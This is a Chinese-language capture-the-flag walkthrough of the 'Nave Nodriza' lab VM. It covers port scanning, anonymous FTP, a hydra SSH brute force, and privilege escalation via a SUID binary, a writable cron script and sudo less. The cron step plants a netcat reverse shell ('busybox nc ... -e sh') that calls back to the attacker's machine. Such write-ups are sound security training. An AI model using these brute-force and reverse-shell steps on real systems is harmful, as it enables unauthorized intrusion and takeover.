Nave Nodriza

image

最近到了一年一度的毕业季了,好多事堆一起导致好久没打靶了,今天抽空打一个😀

信息搜集

1
2
3
4
5
6
7
8
9
10
┌──(root㉿Eecho)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.100.36
Starting arp-scan 1.10.0 with 512 hosts (https://github.com/royhills/arp-scan)
......
192.168.100.46 08:00:27:4d:b7:9f PCS Systemtechnik GmbH
......

113 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 512 hosts scanned in 2.891 seconds (177.10 hosts/sec). 29 responded

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
┌──(root㉿Eecho)-[~]
└─# rustscan -a 192.168.100.46 -- -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where scanning meets swagging. 😎

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.46:22
Open 192.168.100.46:21
Open 192.168.100.46:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.46
Depending on the complexity of the script, results may take some time to appear.
[~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-01 17:12 +0800
NSE: Loaded 158 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
Initiating ARP Ping Scan at 17:12
Scanning 192.168.100.46 [1 port]
Completed ARP Ping Scan at 17:12, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:12
Completed Parallel DNS resolution of 1 host. at 17:12, 1.50s elapsed
DNS resolution of 1 IPs took 1.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0]
Initiating SYN Stealth Scan at 17:12
Scanning 192.168.100.46 [3 ports]
Discovered open port 21/tcp on 192.168.100.46
Discovered open port 22/tcp on 192.168.100.46
Discovered open port 80/tcp on 192.168.100.46
Completed SYN Stealth Scan at 17:12, 0.02s elapsed (3 total ports)
Initiating Service scan at 17:12
Scanning 3 services on 192.168.100.46
Completed Service scan at 17:12, 6.02s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 192.168.100.46
NSE: Script scanning 192.168.100.46.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:12
NSE: [ftp-bounce 192.168.100.46:21] PORT response: 500 Illegal PORT command.
Completed NSE at 17:12, 5.52s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.04s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
Nmap scan report for 192.168.100.46
Host is up, received arp-response (0.00060s latency).
Scanned at 2026-06-01 17:12:21 CST for 13s

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.100.36
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 2 65534 65534 4096 Dec 09 02:32 archivos_publicos
22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0)
| ssh-hostkey:
| 256 af:79:a1:39:80:45:fb:b7:cb:86:fd:8b:62:69:4a:64 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA9i7hiBgZdbqok5ESuJPFfkPuRpcCT6UEeh71LyPq3i2pfdC6S1w4UYO17jknxy06B1COEcaGELE4n2KCor3M4=
| 256 6d:d4:9d:ac:0b:f0:a1:88:66:b4:ff:f6:42:bb:f2:e5 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaMroBaMRuicicDHyP1mRMULBpy4OqNENpp/l/O/cIq
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.65 ((Debian))
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.65 (Debian)
|_http-title: Apache2 Debian Default Page: It works
MAC Address: 08:00:27:4D:B7:9F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
TCP/IP fingerprint:
OS:SCAN(V=7.99%E=4%D=6/1%OT=21%CT=%CU=35492%PV=Y%DS=1%DC=D%G=N%M=080027%TM=
OS:6A1D4D02%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=
OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F
OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=
OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=40%CD=S)

Uptime guess: 15.120 days (since Sun May 17 14:20:19 2026)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.60 ms 192.168.100.46

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 17:12
Completed NSE at 17:12, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds
Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)
  • 22 SSH
  • 21 FTP
  • 80 HTTP

FTP枚举

rustscan扫描出FTP存在匿名登录

image

访问ftp archivos_publicos目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(root㉿Eecho)-[~]
└─# ftp anonymous@192.168.100.46
Connected to 192.168.100.46.
220 (vsFTPd 3.0.3)
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||33700|)
150 Here comes the directory listing.
drwxr-xr-x 2 65534 65534 4096 Dec 09 02:32 archivos_publicos
226 Directory send OK.
ftp> cd archivos_publicos
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||24695|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 622 Dec 09 02:32 manifiesto_clase_alpha.txt
226 Directory send OK.
ftp> get manifiesto_clase_alpha.txt
local: manifiesto_clase_alpha.txt remote: manifiesto_clase_alpha.txt
229 Entering Extended Passive Mode (|||44957|)
150 Opening BINARY mode data connection for manifiesto_clase_alpha.txt (622 bytes).
100% |*******************************************************************************************************************************************| 622 239.42 KiB/s 00:00 ETA
226 Transfer complete.
622 bytes received in 00:00 (195.87 KiB/s)
ftp> ^D
221 Goodbye.
┌──(root㉿Eecho)-[~]
└─# cat manifiesto_clase_alpha.txt
[NAVE NODRIZA - BITÁCORA DE COMUNICACIÓN]

Mensaje para el Capitán Jano:

"Capitán, confirmo el descenso de emergencia en Titán. La tripulación fue reubicada en grupos de trabajo basados en su rango. Lamentablemente, el protocolo de seguridad falló en las bajas jerarquías. La contraseña de mi terminal de acceso (SSH) fue comprometida; es un término de uso muy común aquí, lo encontré en un listado de seguridad de la vieja Tierra. Debe ser reemplazada inmediatamente. Necesito que el equipo de Analistas me abra un canal de escalada urgente para recuperar el control de mi sesión."

Atentamente,
excluido

翻译过来就是

“船长,我确认在泰坦星(Titán)进行了紧急降落……不幸的是,低级别人员的安全协议失效了。我的访问终端(SSH)密码泄露了;那是这里非常常用的一个词,我是从旧地球的安全列表中找到的。必须立即更换。我需要分析师团队为我打开一个**紧急提权( escalada)**通道,以恢复对会话的控制。” —— excluido(被排斥者/被排除的人)

信件签名者为 excluido,这极大概率就是SSH 登录用户名。

hydra爆破

尝试使用hydra爆破密码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root㉿Eecho)-[~]
└─# hydra -l excluido -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.46 -t 4 -Vv
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-06-09 23:00:18
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task
[DATA] attacking ssh://192.168.100.46:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://excluido@192.168.100.46:22
[INFO] Successful, password authentication is supported by ssh://192.168.100.46:22
[ATTEMPT] target 192.168.100.46 - login "excluido" - pass "123456" - 1 of 14344399 [child 0] (0/0)
[ATTEMPT] target 192.168.100.46 - login "excluido" - pass "12345" - 2 of 14344399 [child 1] (0/0)
[ATTEMPT] target 192.168.100.46 - login "excluido" - pass "123456789" - 3 of 14344399 [child 2] (0/0)
[ATTEMPT] target 192.168.100.46 - login "excluido" - pass "password" - 4 of 14344399 [child 3] (0/0)
[22][ssh] host: 192.168.100.46 login: excluido password: password

成功获取到excluido的凭证

getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
┌──(root㉿Eecho)-[~]
└─# ssh excluido@192.168.100.46
***************************************************
* ADVERTENCIA: CONEXIÓN A NAVE-NODRIZA ACTIVA *
* PROTOCOLO ALPHA. ACCESO RESTRINGIDO. *
***************************************************
excluido@192.168.100.46's password:
Linux TheHackersLabs-NaveNodriza 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Jun 9 16:58:18 2026 from 192.168.100.19
excluido@TheHackersLabs-NaveNodriza:~$ id
uid=1001(excluido) gid=1001(excluido) grupos=1001(excluido)
excluido@TheHackersLabs-NaveNodriza:~$

提权

excluido -> analista

查找suid文件

1
find / -perm -4000 2>/dev/null

image

使用strings可以发现执行了/bin/bash且有s位

image

拥有者是analista,所以可以利用ejecutor_shell提权到analista用户

image

analista -> investigador

1
2
3
4
excluido@TheHackersLabs-NaveNodriza:/opt/nave_nodriza_herramientas$ /opt/nave_nodriza_herramientas/ejecutor_shell
analista@TheHackersLabs-NaveNodriza:/opt/nave_nodriza_herramientas$ id
uid=1002(analista) gid=1001(excluido) grupos=1001(excluido)
analista@TheHackersLabs-NaveNodriza:/opt/nave_nodriza_herramientas$

在/home/analista/log_temporal_sistema目录下有个procesar_datos.sh是root用户创建的文件且log_temporal_sistema文件夹的权限是777

1
2
3
#!/bin/bash
# Script de procesamiento de datos
echo "Procesando datos de la Nave Nodriza..."

image

上传pspy查看是否存在定时任务执行procesar_datos.sh脚本

1
2
3
4
5
6
7
8
9
10
excluido@TheHackersLabs-NaveNodriza:~$ cd /tmp/
excluido@TheHackersLabs-NaveNodriza:/tmp$ wget
-bash: wget: orden no encontrada
excluido@TheHackersLabs-NaveNodriza:/tmp$ busybox wget http://192.168.100.19/pspy64
Connecting to 192.168.100.19 (192.168.100.19:80)
saving to 'pspy64'
pspy64 100% |*************************************************************************************************************| 3032k 0:00:00 ETA
'pspy64' saved
excluido@TheHackersLabs-NaveNodriza:/tmp$ chmod +x pspy64
excluido@TheHackersLabs-NaveNodriza:/tmp$ ./pspy64

image

UID=1003的用户执行了/home/analista/log_temporal_sistema/procesar_datos.sh,查看了passwd发现是investigador用户

image

既然log_temporal_sistema文件夹的权限是777那么就可以修改procesar_datos.sh进行提权

这里写入的是反弹shell

1
2
3
rm -rf procesar_datos.sh
echo -e '#!/bin/bash\nbusybox nc 192.168.100.19 7777 -e sh' > procesar_datos.sh
chmod +x procesar_datos.sh

image

investigador -> root

1
2
3
4
5
6
7
investigador@TheHackersLabs-NaveNodriza:~/.ssh$ sudo -l
sudo: unable to resolve host TheHackersLabs-NaveNodriza: Nombre o servicio desconocido
Matching Defaults entries for investigador on TheHackersLabs-NaveNodriza:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User investigador may run the following commands on TheHackersLabs-NaveNodriza:
(root) NOPASSWD: /usr/bin/less

less提权

image

1
2
sudo /usr/bin/less /etc/hosts
!/bin/bash

image

image